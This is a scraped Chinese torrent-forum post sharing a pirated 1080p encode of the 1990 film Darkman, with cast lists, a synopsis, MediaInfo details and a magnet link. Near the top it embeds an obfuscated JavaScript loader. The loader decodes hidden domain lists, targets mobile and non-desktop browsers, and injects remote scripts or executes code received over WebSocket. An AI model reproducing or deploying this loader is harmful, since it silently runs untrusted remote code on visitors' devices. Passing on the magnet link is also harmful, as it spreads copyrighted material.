变形黑侠[中文字幕]Darkman.1990.1080p.BluRay.DTS.x265-10bit-迅雷下载 11.44GB

版主小s 18天前 249

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 变形黑侠 / 魔侠震天雷(台) / 隐形黑侠

◎片 名 Darkman

◎年 代 1990

◎产 地 美国

◎类 别 动作 / 科幻 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1990-08-24

◎IMDb链接 https://www.imdb.com/title/tt0099365/

◎豆瓣评分 6.6/10 (1377人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300209/

◎片 长 96 分钟

◎导 演 山姆·雷米 Sam Raimi (id:1027159)

◎编 剧 山姆·雷米 Sam Raimi (id:1027159)

查克·费尔 Chuck Pfarrer (id:1294429)

◎演 员 连姆·尼森 Liam Neeson (id:1031220)

弗兰西斯·麦克多蒙德 Frances McDormand (id:1010548)

科林·弗瑞尔斯 Colin Friels (id:1027984)

拉里·德雷克 Larry Drake (id:1081024)

丹·希克斯 Dan Hicks (id:1096157)

泰德·雷米 Ted Raimi (id:1036535)

Nicholas Worth Nicholas Worth (id:1055139)

阿隆·鲁斯汀 Aaron Lustig (id:1116537)

布鲁斯·坎贝尔 Bruce Campbell (id:1069816)

乔尔·科恩 Joel Coen (id:1054517)

伊桑·科恩 Ethan Coen (id:1054401)

尼尔·麦克唐纳 Neal McDonough (id:1031878)

布里奇特·霍夫曼 Bridget Hoffman (id:1419993)

托尼·加德纳 Tony Gardner (id:1284564)

Carl Bresk Carl Bresk (id:1074772)

威廉·迪尔 William Dear (id:1282121)

田中通教授 Professor Toru Tanaka (id:1157875)

斯科特·斯皮格尔 Scott Spiegel (id:1014264)

肖恩·丹尼尔 Sean Daniel (id:1023446)

约翰·兰迪斯 John Landis (id:1025259)

珍妮·艾加特 Jenny Agutter (id:1036466)

约翰·卡梅伦 John Cameron (id:1073995)

杰西·劳伦斯 Jessie Lawrence Ferguson (id:1085331)

尤利乌斯?哈里斯 Julius Harris (id:1097756)

Craig Hosking Craig Hosking (id:1100422)

纳丹·晶 Nathan Jung (id:1103092)

威廉·拉斯蒂格 William Lustig (id:1007207)

丹尼·艾夫曼 Danny Elfman (id:1019059)

比尔·波普 Bill Pope (id:1018460)

巴德·S·史密斯 Bud S. Smith (id:1297850)

David Stiven David Stiven (id:1298471)

Randy Ser Randy Ser (id:1297224)

Phil Dagort Phil Dagort (id:1035685)

Julie Kaye Fanton Julie Kaye Fanton (id:1283428)

Grania Preston Grania Preston (id:1294875)

Roland Blancaflor Roland Blancaflor (id:1064418)

托尼·加德纳 Tony Gardner (id:1284564)

Larry Hamlin Larry Hamlin (id:1285916)

约翰·卡梅伦 John Cameron (id:1073995)

Paul Gentry Paul Gentry (id:1004084)

Rick Rische Rick Rische (id:1148188)

威廉·梅萨 William Mesa (id:1291905)

Michael Pangrazio Michael Pangrazio (id:1293881)

Tim Donahue Tim Donahue (id:1282562)

罗伯特·斯科塔克 Robert Skotak (id:1297751)

克莱格·巴朗 Craig Barron (id:1277981)

Jerry Macaluso Jerry Macaluso (id:1013096)

◎标 签 科幻 / 美国 / 动作 / 犯罪 / 1990 / 美国电影 / 漫画改編 / Sam_Raimi

◎简 介

经过多年的潜心研究,培顿博士(连姆·尼森 Liam Neeson 饰)终于研制出了人造皮肤,可是,这种人造皮肤有一个致命的弱点,那就是长时间的阳光照射会使它变质腐坏。一群歹徒盯上了佩顿博士的研究,为了得到这珍贵的发明,他们不惜炸毁了实验室。尽管培顿博士死里逃生,但他的全身皮肤严重毁损已成为了事实。

治疗所带来的痛苦和副作用让佩顿博士的内心充满了愤怒,怀揣着复仇的信念,他逃出了医院。利用自己所发明的人造皮肤,佩顿博士有了新的面孔,与此同时,一个新的超级英雄也就此诞生。在罪犯们的眼中,培顿博士是令人闻风丧胆的凶神恶煞,可在昔日爱人的面前,佩顿博士却感受到了久违的悲伤和痛苦。

  1. General

  2. Unique ID : 55535952116494232644040204919592452901 (0x29C7D5D757C55028E052A905F5180325)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.4 GiB

  7. Duration : 1 h 35 min

  8. Overall bit rate : 17.2 Mb/s

  9. Movie name : Darkman 1990 1080p BluRay DTS [email protected]

  10. Encoded date : UTC 2021-07-15 02:21:43

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 35 min

  20. Bit rate : 15.7 Mb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.315

  30. Stream size : 10.4 GiB (91%)

  31. Title : [email protected]

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 35 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 2 channels

  44. Channel layout : L R

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.00 GiB (9%)

  50. Title : English

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 28 min

  61. Bit rate : 22.0 kb/s

  62. Count of elements : 1640

  63. Stream size : 13.9 MiB (0%)

  64. Title : CHS

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 28 min

  75. Bit rate : 22.4 kb/s

  76. Count of elements : 1640

  77. Stream size : 14.2 MiB (0%)

  78. Title : CHT

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Menu

  83. 00:00:00.000 : en:Chapter 01

  84. 00:10:30.004 : en:Chapter 02

  85. 00:19:34.965 : en:Chapter 03

  86. 00:29:46.952 : en:Chapter 04

  87. 00:40:33.014 : en:Chapter 05

  88. 00:49:55.951 : en:Chapter 06

  89. 00:59:12.924 : en:Chapter 07

  90. 01:09:02.889 : en:Chapter 08

  91. 01:19:30.891 : en:Chapter 09

  92. 01:29:39.916 : en:Chapter 10



TAGS 动作 惊悚 犯罪 科幻

磁力链:
  • magnet:?xt=urn:btih:7B4E068C2841B09325C21BAEEE99F77AE2430DC8
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回